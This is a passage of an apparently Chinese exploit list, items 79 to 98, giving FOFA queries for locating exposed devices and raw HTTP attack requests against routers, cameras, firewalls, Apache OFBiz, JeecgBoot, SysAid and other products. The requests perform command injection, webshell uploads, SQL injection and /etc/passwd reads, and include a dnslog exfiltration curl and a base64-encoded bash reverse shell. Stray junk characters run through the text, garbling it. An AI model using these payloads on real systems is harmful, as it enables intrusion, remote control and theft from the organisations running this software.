3 r2 t& ]$ U* {6 h6 [' Y5 w6 ?( t) PHost: x.x.x.x4 [) k! k( f- U, H. I7 U
" ~) m& P) i. U, |
: R/ i: f9 ]6 i/ T
79. BYTEVALUE 百为流控路由器远程命令执行! s. R r9 w( P% }
FOFA:BYTEVALUE 智能流控路由器, a4 A& M8 m1 w e9 k
GET /goform/webRead/open/?path=|id HTTP/1.1+ t# v( P3 w+ H1 ~1 r
Host:IP/ u* H% R# S1 L# k/ E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0, v* i4 x: B6 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. M8 m' A- t! `1 E n1 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 Y4 q( O* _9 }( x; |; M/ J& cAccept-Encoding: gzip, deflate+ f7 X/ Q6 n% k P, ^
Connection: close' e; e5 A) ~" |8 D$ E/ f
Upgrade-Insecure-Requests: 1
, s- V5 b+ c3 J, J
9 E: b( V% a& J3 C: E' p
8 O, `: R; B1 @, h* n: H80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
- V0 k: U: G/ }- F# u8 ZFOFA:app="速达软件-公司产品"
3 d- }) i& i5 K+ m) n/ ?( GPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
, ]) ^" E- s1 N& R$ `Host: x.x.x.x
5 G& Q4 R6 K) I' BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' i4 i2 n; P9 ]9 fContent-Length: 27" N% X6 U* h4 _. F5 { `8 {3 y9 j" N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. T7 l& j" Q; U! \! Z
Accept-Encoding: gzip, deflate! @& n" u& P. e @; K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ g. `$ @* S; c: G P
Connection: close1 B( t9 ]# [/ t% _* ]( g
Content-Type: application/octet-stream
' E8 `( Q7 }* S6 \ `( lUpgrade-Insecure-Requests: 1, V8 j% Q5 a8 _8 p* q
- S! e, j' ^2 ^, i: }4 Y% o( g
<% out.print("oessqeonylzaf");%>1 o* K. i$ s2 O1 Q1 {# w
. P% P7 B+ q( {8 ]# q8 M
0 c9 {- j9 o0 q/ q5 `/ DGET /xykqmfxpoas.jsp HTTP/1.1/ ~7 [4 p$ t$ \: U" J5 n. d1 q
Host: x.x.x.x A# s5 l+ u& f" t+ \ q/ Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ r9 L! i6 L1 R) g+ S {
Connection: close
r0 d" k' r/ L0 b9 s# yAccept-Encoding: gzip
/ C. b6 \" \: H8 ^' Z
& _( x& E0 a! i' w9 S; z9 W/ R6 Z- ?0 y! x2 K* x
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露1 M6 w! e& B E' D+ I) J, d) g
FOFA:app="uniview-视频监控"" M, u) n/ ?2 r' M# ^. O
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
- \" O3 s W# k. E7 C! k! dHost: x.x.x.x
' y% w. E. X% u( x* u% eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" i4 f( S. b/ i/ o) J
Connection: close# W# t3 n( o. @7 A
Accept-Encoding: gzip
+ ]. y0 ]0 [' }
5 @) W- J; N% U* R4 f" @- `7 U
$ L/ y! k1 u, g0 P' r3 f82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行; v) q' p* H2 J2 W# ]* |/ |" w
FOFA:app="思福迪-LOGBASE"
4 m' K" e* m) t: u" s2 X \POST /bhost/test_qrcode_b HTTP/1.1
+ Z3 j& o* t( iHost: BaseURL
' A/ }$ N" U2 NUser-Agent: Go-http-client/1.1
3 M2 Z8 t. S: q2 N! Z8 fContent-Length: 23
3 U' Z- J$ d& c. t3 Y7 m7 |Accept-Encoding: gzip
2 @5 D$ G2 l$ ^# v# w- q6 n4 RConnection: close! U! z8 l6 j3 @- R& u
Content-Type: application/x-www-form-urlencoded
, C& i. I: i- i K5 E, _Referer: BaseURL# ~+ U% u H& X
7 W( k7 e3 D, g. W+ n2 d& Az1=1&z2="|id;"&z3=bhost
0 r- C% J3 n$ U) k( p0 w* Q8 N! b; J% B+ a4 V
2 h3 i# l. R5 l0 \' b83. JeecgBoot testConnection 远程命令执行
' S2 a1 z$ E# E6 R( S+ lFOFA:title=="JeecgBoot 企业级低代码平台"
5 t; g) G- f! A5 M V2 ?/ {0 d+ b2 Z# G% k. {0 X1 y1 A
! w# o Y g! @9 U! l) sPOST /jmreport/testConnection HTTP/1.1
/ |; C. Y) |% I9 M# ]Host: x.x.x.x
. n5 l; c! E3 O g. \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 s4 j- R5 X4 i' ?. X2 i
Connection: close+ h& r2 ?# b& u5 K. @' H
Content-Length: 88816 u; D* [! O, ~" z" {9 z
Accept-Encoding: gzip
& S' @$ e/ q! T' M9 j1 nCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO") e8 ]# h$ U+ C! Y9 G
Content-Type: application/json
% c- B/ W, G8 J( T0 [4 O8 L+ L5 X( H
+ }, W0 m0 }# W4 BPAYLOAD& P9 o1 l+ Q7 ]
; C" A; j( T+ H$ h. ]) A- p84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
6 @* T; u# |( _* ~6 C; N, r8 fFOFA:title=="JeecgBoot 企业级低代码平台"* ?2 l, w4 T( l6 o5 v3 _
2 u; ]' Y$ r2 U$ D
1 W- C6 a* X% L: N% R$ r- u1 e5 p/ V
# d' h" L" J+ F5 n
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
0 @& m4 D% `. O9 p3 b. uHost: 192.168.40.130:8080
1 W1 C) K2 t9 ]- c; \ O1 SUser-Agent: curl/7.88.1/ E& V, l( b+ _% a7 ^
Content-Length: 1569 E C; z# j0 Q& p1 x
Accept: */*( _" N' N R, h+ a6 E
Connection: close
! Q, l0 D k% A. t8 b! m0 w9 KContent-Type: application/json
3 [& [. _( k |/ I7 RAccept-Encoding: gzip& c6 o- k( s, G2 k0 c
, F$ i2 S }) z( r! l! S
{' E. X t" P- e6 L
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
6 {9 S/ C8 X1 E! e3 z; r3 G0 Z "type": "0"
. M9 H2 J0 n' w# z# B$ M8 M1 U}
" V& T' c2 h! Z7 E2 } F. r1 D. f8 I c+ r! S1 `2 f
. x" f; \2 P& _5 I, d
85. SysAid On-premise< 23.3.36远程代码执行7 | `' i3 s) C. J' X/ T, L
CVE-2023-47246
6 H: t' N4 Y( p& eFOFA:body="sysaid-logo-dark-green.png" : W& I1 y& J0 T2 Y: L
EXP数据包如下,注入哥斯拉马4 K6 g$ C( j b1 k; {
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
/ O, t* k8 {: G0 e+ x9 Q3 wHost: x.x.x.x) x; [) a! w4 B+ H$ e& `" k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ q4 H+ }9 G. V6 |
Content-Type: application/octet-stream
! P" L4 [; Y z& P8 nAccept-Encoding: gzip
) s# @# `0 v: `) S
8 j" O( O( D2 ePAYLOAD
7 D$ F4 O. \8 L% Q: k# ^6 J0 R- B1 q3 R4 z5 t* G
回显URL:http://x.x.x.x/userfiles/index.jsp; s( P& A0 f2 y: ~7 k6 D9 E
$ A8 R$ U% n( e' L; ]; X+ n; p/ _9 z
86. 日本tosei自助洗衣机RCE
% U6 Z6 y6 E2 R6 s1 I5 cFOFA:body="tosei_login_check.php"4 v' ~4 D, w: z- Y
POST /cgi-bin/network_test.php HTTP/1.14 u* }. G. Q% r2 t# @
Host: x.x.x.x
/ B9 V3 y7 n/ J# Q+ Y6 E) a* yUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
. @$ V$ M" S' ^% H2 |Connection: close9 f. W- ^% B* P* q) l
Content-Length: 44; t* J* E8 t5 e$ Q! N
Accept: */*; B9 R1 K. x8 E; I! F6 L- _, o
Accept-Encoding: gzip
2 H# X# Q3 S' y$ a* KAccept-Language: en
5 v: m/ o; r7 W1 E# LContent-Type: application/x-www-form-urlencoded8 C! G$ L5 ^' W" o6 [- l* [
7 c, [2 o5 R0 p
host=%0acat${IFS}/etc/passwd%0a&command=ping! M0 ~$ i1 H4 t" k2 J
$ l$ @; W0 G0 {
6 d0 x2 n. O0 ]) L$ |3 B- N87. 安恒明御安全网关aaa_local_web_preview文件上传
, e. j' e K( W; S6 I4 A% P7 pFOFA:title="明御安全网关"
0 E5 t3 `: V6 {4 l& nPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
7 F. O# }/ _0 @5 E5 lHost: X.X.X.X
, E9 | G' F; }7 d, P! Y* {( l' {1 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 D, v( Y3 |- v) S, bConnection: close
/ B* P0 A; S: m" f& o8 tContent-Length: 198) s9 H" {; G2 Y) I- g! A4 a8 i, P- n) [* ~
Accept-Encoding: gzip) |' A1 r6 [. A- O. ~: D! s2 b
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd6 B- N6 w( U0 x0 r
3 w0 H: N: J, j5 s" z' b! R; R5 g--qqobiandqgawlxodfiisporjwravxtvd) s* z! J5 i2 U3 z/ u' Q& L$ L
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"# y* z' i0 W8 Z% ~
Content-Type: text/plain
3 ~: y# p# T1 R$ _# `8 F
7 g4 R% i8 P* U' h6 l: K r2ZqGNnsjzzU2GBBPyd8AIA7QlDq
% j. L4 ] M! r$ F( J0 O) ]& J--qqobiandqgawlxodfiisporjwravxtvd--& y/ d+ w& i5 l Y
! a( i @+ x1 h6 F3 T w1 K
: w: {) `$ h2 \( y) P- g5 v
/jfhatuwe.php% N# k+ n9 L4 w! P& k
7 P# A9 U' Q L5 Y88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
a$ B" K/ [! i- C& A9 ?FOFA:title="明御安全网关"4 j7 A1 r# z5 }7 ^
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1. V: o8 w0 j6 l. q k& {
Host: x.x.x.xx.x.x.x
/ I/ ]1 @( Q) S" {& x! AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* y% n# F9 k! EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 B0 h) s7 h; j! m; `- mAccept-Encoding: gzip, deflate
$ |2 X/ W6 A. l& q$ |$ o% Y4 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 n) R4 I. j) s* i. f
Connection: close* |* Y6 f5 A' u( y# m
' r4 H! O0 M: |8 y3 r: Q3 ?
, U& c- k5 J. v' l
/astdfkhl.php5 `# F+ B* s5 k
. m% u- q- P# i89. 致远互联FE协作办公平台editflow_manager存在sql注入
% [/ s5 `/ D* Q) iFOFA:title="FE协作办公平台" || body="li_plugins_download"
" V" Q6 q* V6 z! RPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
( w h9 P+ |. x u$ Z0 ~Host: x.x.x.x
( S# q) y. U% QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ |0 b0 D3 L: v! y1 I2 a. p0 H
Connection: close0 r& ~% v- w/ p! h
Content-Length: 41
6 X+ b. e0 ]$ E( s% pContent-Type: application/x-www-form-urlencoded; M# i* a3 I$ @/ H% e# s0 t
Accept-Encoding: gzip% O- f7 l L0 }" b) S! v
" c* T6 i6 ?/ X3 a6 Coption=2&GUID=-1'+union+select+111*222--+
1 ^3 Y7 \; ?! a& V3 `3 c% N5 t
& `7 e L" A7 y% \) Y
! ^3 J' w8 Q, d( z& e+ R, [90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行, j# G. @ Z% k" f
FOFA:icon_hash="-1830859634"6 y4 m0 [) t0 m" W" ^ L
POST /php/ping.php HTTP/1.1
% p, I- k* m, bHost: x.x.x.x
9 G/ N; q' x" k/ w1 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.03 ?# ~" t4 z. A
Content-Length: 51 k- Z4 d7 ?0 U
Accept: application/json, text/javascript, */*; q=0.01
1 Z O5 j/ W$ i3 T& EAccept-Encoding: gzip, deflate
" G& P- f6 ]4 x; c+ ~( p @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 w& K Y& F9 }$ |$ `; dConnection: close
$ q7 i U5 ~$ F* {' t' DContent-Type: application/x-www-form-urlencoded
* z5 n) O2 @3 G8 i/ Q: r$ FX-Requested-With: XMLHttpRequest3 Q& r& C$ ]! _. w4 \) W, T
+ ]0 k* k/ M8 L. f% V! v9 D
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig, k8 X2 }* x. i6 t; [; ?
. }, C( d! f7 k4 z; Z: L$ G( ]
9 C: B& I( p5 G) Z" s4 _# F9 S91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取; l* h! W) D. _
FOFA:title="综合安防管理平台"
" ]0 G% e, ?/ Z( F) o( kGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
2 m& W _1 ?& ~2 l# W7 n' @4 {( gHost: your-ip+ L6 T% C4 @4 y8 P, e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+ A5 K" X: Z3 V# z. w1 i) \3 RAccept-Encoding: gzip, deflate& F5 y3 Q% l$ i( M
Accept: */*
* ^7 e; \; }) J5 P- ~7 d4 WConnection: keep-alive
f) R, s' }) ]" l
$ e- g6 ]- A( Z6 S' i; S: b) O
9 r) U6 l# H7 [* O N# g- _- T
- F, i0 V4 E. ]8 Y5 T' S$ J92. 海康威视运行管理中心session命令执行: s' F5 I; G# L( q" t
Fastjson命令执行5 h! d# {/ _$ B# a+ m% p
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"1 V* G8 _& a$ ]
POST /center/api/session HTTP/1.1/ B7 S0 u% d% q/ W
Host:
4 B! Y* Q" y% Q) SAccept: application/json, text/plain, */*
& k% K4 D) ~9 [: P. f" s) E0 XAccept-Encoding: gzip, deflate1 g4 U. j! N: T
X-Requested-With: XMLHttpRequest7 }6 T8 n; `/ V( s( i
Content-Type: application/json;charset=UTF-85 B8 o% b* f: G: u
X-Language-Type: zh_CN4 t- E/ ]& c! [. Z. l) k
Testcmd: echo test
; b7 Y- c% q0 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36+ c2 ~4 {; Q7 a. T! I
Accept-Language: zh-CN,zh;q=0.9
5 C9 |0 e" ^4 IContent-Length: 57786 {2 O9 Q0 h* y8 Z" s3 s
7 s$ @' c; K( ?- W- `2 ?
PAYLOAD, V- a: }6 @, `9 e+ l
8 O! t O0 M9 \: C, G6 [6 D. r
; B# U4 f9 Y8 `( m% V
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传6 J" J3 u- i3 ?9 U" w
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="% s6 l( O/ r1 d2 [' \- Y0 ?1 h
POST /?g=app_av_import_save HTTP/1.1
" a% t5 c- x8 k1 oHost: x.x.x.x
. C: O4 ]) t* e2 L) {4 e- u9 wContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
9 S5 F7 B9 M( A2 wUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 @0 t. Q: y6 `" y6 U5 ?
' {1 {! l8 R# A' }: { o% H" ~------WebKitFormBoundarykcbkgdfx
! e6 z& {; f: r1 u( qContent-Disposition: form-data; name="MAX_FILE_SIZE". ?6 D- X7 D( C. G
; v0 A. @8 T2 q. s' g3 `) a10000000
1 x( l) E5 e1 ~/ q1 G! R* g" b; g T% ]------WebKitFormBoundarykcbkgdfx
7 l; | Y. e# mContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt", b$ U$ Y3 g8 ^+ g: o, b
Content-Type: text/plain* Z0 z0 p4 O2 O' W+ P. s
" g/ G+ k }; ?3 V* ]wagletqrkwrddkthtulxsqrphulnknxa- f2 O# P' } Z# f
------WebKitFormBoundarykcbkgdfx" m4 ?: L H5 r: c! D
Content-Disposition: form-data; name="submit_post"
5 r8 n8 R/ ?2 l3 O1 H
3 V5 q2 P3 `) W; s4 O- v6 |6 qobj_app_upfile
8 k9 B% X+ M1 d' |9 `------WebKitFormBoundarykcbkgdfx' j/ k0 K7 h1 Z4 j7 q; h. x
Content-Disposition: form-data; name="__hash__"
% @' {) s* r$ i& m* e, |
1 a9 I2 v" M* ^0b9d6b1ab7479ab69d9f71b05e0e94459 K7 e2 B1 S$ [
------WebKitFormBoundarykcbkgdfx--
% P1 R2 `; n7 K- u; P/ f- w& T( {% J4 |) D4 ]
2 Y, e6 G1 Q! ~7 d' @" F9 N! ~
GET /attachements/xlskxknxa.txt HTTP/1.14 c3 m0 V J) B% f5 j
Host: xx.xx.xx.xx7 S& P6 S0 a2 p' p% ]' e7 M6 P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& e" B) x) x: u! O; {. b5 R# P0 p8 J3 r9 a. S1 H
. {$ U: s5 `2 O2 h e$ j# y/ F% g6 n
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
X8 F1 |8 m2 }- j; [FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
! W0 J, k4 \: T: \0 G& A& sPOST /?g=obj_area_import_save HTTP/1.1% x: ~1 Q4 }- y7 J( o" B8 \5 s+ y
Host: x.x.x.x# C4 k7 ?* A6 D* Y" _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt1 d1 O4 r2 G3 M! g/ O/ z7 J4 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36) ]9 N! {% z4 F9 n& _
" E6 \6 m* [7 ] K6 V& `0 d! h
------WebKitFormBoundarybqvzqvmt
/ H$ n: o/ E* l Z) AContent-Disposition: form-data; name="MAX_FILE_SIZE"
5 I% g ~5 C: @* _6 y6 r$ q/ q+ Q; d+ u1 T5 M# y
10000000$ ?2 V7 r n- o& Q
------WebKitFormBoundarybqvzqvmt" t! I( k8 [5 H. Q1 ~
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
) G+ T* |5 o1 u8 U$ w9 G9 BContent-Type: text/plain
' }' g' ~2 d8 [/ L L
; l0 ]* ?2 B% v8 ~0 O+ x' I$ }. ipxplitttsrjnyoafavcajwkvhxindhmu) w8 T' ]4 T+ A v/ X. q$ D
------WebKitFormBoundarybqvzqvmt; i5 b1 O1 S h) e
Content-Disposition: form-data; name="submit_post"
+ ^+ d# i8 E+ L- ~" z2 F3 G2 V
9 r& k; i1 n" M; p* h- zobj_app_upfile. M( Z5 V, Z4 e `9 L* s
------WebKitFormBoundarybqvzqvmt
) q& q' w, I% K: M' }" n2 iContent-Disposition: form-data; name="__hash__"
6 z' V( q: [& q" D$ S+ }
5 g1 U* m t- \% ]! P* ^0b9d6b1ab7479ab69d9f71b05e0e9445
& |( G G; n3 \+ L$ J------WebKitFormBoundarybqvzqvmt--
& q. l. w! ?( A/ A% L. F5 Q: t# t& G* r
1 [, ^; T2 i8 b2 R, B( P8 C$ K5 X- [7 O& ~
GET /attachements/xlskxknxa.txt HTTP/1.1
- S2 w( C1 u5 i z9 Y: o3 FHost: xx.xx.xx.xx
: V, e4 ~& Z" }4 O/ U) z$ AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' _3 D6 N1 B- ~# M' f. H
" b+ f& }# }5 f9 E& E9 c
8 D* I& m( x+ R& e" i' A6 i1 l0 A# ^3 ?$ q2 [
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
8 X3 O$ [! T* ~3 G- u: k5 g! PCVE-2023-490704 c$ q9 T+ h# l6 b$ O2 V
FOFA:app="Apache_OFBiz"
' v/ Y' ?' G. ^& }POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
7 j4 M1 \: T- |Host: x.x.x.x, F6 Y* G* c, k: I9 _2 z ?1 D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
) e+ s/ l/ l8 n6 |1 ^Connection: close1 W: y; ]' l+ g$ S- O! J- q* p( }0 l
Content-Length: 889; m: t4 h! I! n- ~" u
Content-Type: application/xml
8 J$ E/ D5 i; s8 _5 `# KAccept-Encoding: gzip
' R7 Y( ?/ Q% }* u. p3 e" ~ m- M
# Y- o: K3 N- D0 K5 l% g0 |. i i<?xml version="1.0"?>. S- k. t, I$ ] Z, T, N! ~7 z
<methodCall>$ D) ~- l2 M5 i( @5 ~( f
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>+ G/ O3 c2 C" b0 g
<params>
! h6 e2 I! @# } <param>
. C g( {! ^2 Y! V) R <value>
4 P& F- J: p/ D <struct>9 H( y- p+ |0 ^3 t1 W, [
<member>/ w3 I5 M. e: A6 D0 M% s* i* Y
<name>test</name>+ s( o8 [2 }& Z6 P1 `9 U+ S9 l
<value>: S: e) c8 [4 w) I! Y- P/ [
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
2 u k5 I/ J/ y$ c# E+ J </value>
! F7 d2 w' I+ x9 T0 U </member>
( A; _2 V" d/ j" Y, W </struct>
7 Z- |2 d1 S& a </value>
1 D+ C! n" x( u </param>- s7 I: q. }- k- S& A/ a) l3 F' d# s6 `* N
</params>3 ]+ D8 u9 S7 u; `5 h
</methodCall>5 I4 w7 ? J7 J! J
: n `! r0 t C/ L
; p' ?. R/ X2 M8 g用ysoserial生成payload
, `% E% G7 o* C3 F, @8 ~7 \java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"2 M& ]" |$ R& x8 R" b h
3 ~8 V) d0 D, i) l" P) u' Z0 p+ R
( F" a/ b8 s8 A! D1 j% f将生成的payload替换到上面的POC
/ s" c* t& D. m/ g/ `5 v: H% t9 bPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
( l4 y, ?# m0 hHost: 192.168.40.130:8443- y+ _ E& V, Q, B% E( D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.369 b$ M" L/ Y6 b. d
Connection: close$ |$ f8 @! Q w2 f
Content-Length: 889
7 l6 \4 T' C! Y7 A, MContent-Type: application/xml) |) d" I2 e1 I, A: D2 d
Accept-Encoding: gzip3 a/ @5 Z. I+ l' [- r
0 M* W; h X# s3 ^) nPAYLOAD0 I; k1 C8 W1 W1 h: R* H) R
8 M' m) B$ A) |96. Apache OFBiz 18.12.11 groovy 远程代码执行
" |5 Q: z: \9 _6 G5 L7 i* S: ^FOFA:app="Apache_OFBiz"3 l( {' N) {9 [) w4 U
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1. H3 d3 I' M% f, c7 ~' F
Host: localhost:8443* Q2 b7 @1 `1 ?2 Z2 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 ^, z) q0 S0 D
Accept: */*
! b0 _. A8 ~1 I6 w& NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: a; A; O) r+ d. h5 I# O' e
Content-Type: application/x-www-form-urlencoded
/ [/ I$ o. j. B% z( PContent-Length: 55( J5 ^* j+ n( i* ?+ G/ Q5 f) X( D2 D
) e* K+ K/ @8 q9 a
groovyProgram=throw+new+Exception('id'.execute().text);4 Z/ H% t# q; w" E7 ~2 e
' w/ m# P5 f5 K C& }( L" x0 U$ x
2 ^ T: c+ K L% b/ I反弹shell+ d9 L! Z' P3 g
在kali上启动一个监听/ ^, w6 V/ Q& E C+ A3 L- }
nc -lvp 77774 |' S- O1 R6 Q% I
' h; J5 j! E. ZPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1! B0 \/ _1 P, s7 e5 Q1 M
Host: 192.168.40.130:8443
( D, c! G" r( W3 k6 H" LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& G- Y8 a* O4 A/ N( q5 h
Accept: */*5 c- x& C1 n& m/ Y5 E+ ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 ~9 Z$ f9 ]; Y L6 m
Content-Type: application/x-www-form-urlencoded9 P, \' j2 {0 J" Z! K6 P) ~
Content-Length: 71/ w. `) x& j& z3 P" ]6 {5 I1 ^
! _8 Y! d: r/ G7 I# TgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();4 a) n; k; q: i6 o" r) \: c
! A4 o+ s' o. X2 A7 f: A4 l: ?
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
3 h/ Q* f& h' e LFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
$ g2 A/ Z5 S$ T H6 jGET /passport/login/ HTTP/1.1
2 |8 |0 d2 Y5 w. ]" g/ h& qHost: 192.168.40.130:8085
; r {$ a$ H% f$ `* b9 F, J) m2 _+ JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ e* H; N, [2 z3 s
Accept-Encoding: gzip
$ Y/ ~# D1 i, U% P$ A1 kConnection: close0 }- G! Y+ t: G4 I" N& @4 f
Cookie: rememberMe=PAYLOAD% R' \* K& N1 e" L6 R
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
+ C4 G! L+ `# h3 k# l$ R' M" c: P' L1 c
0 ~$ L& }: q/ W+ {8 ]98. SpiderFlow爬虫平台远程命令执行
, F4 {% `1 b! r" NCVE-2024-0195; J4 {3 P- a* F6 |' j# ~$ J
FOFA:app="SpiderFlow"
Y, Z; h& h/ o t, |POST /function/save HTTP/1.1% C( e% s% O6 c5 N
Host: 192.168.40.130:8088' Q/ X; p0 E. m- B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
0 d, Q% s- f0 NConnection: close
9 R+ w5 t; g) [9 H& \/ ^Content-Length: 121
6 H* \! b8 W; v% q4 u# b+ y4 B+ ^Accept: */*
0 [- r# b+ T3 I( NAccept-Encoding: gzip, deflate: I" o. f2 }8 r7 y$ v' ~5 |! t2 ], \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% l: |* f' O# _( m
Content-Type: application/x-www-form-urlencoded; charset=UTF-84 K$ E- Y n6 ?* n6 Q, n+ w) l7 D
X-Requested-With: XMLHttpRequest- T, w7 Z. u3 \7 R" T8 }
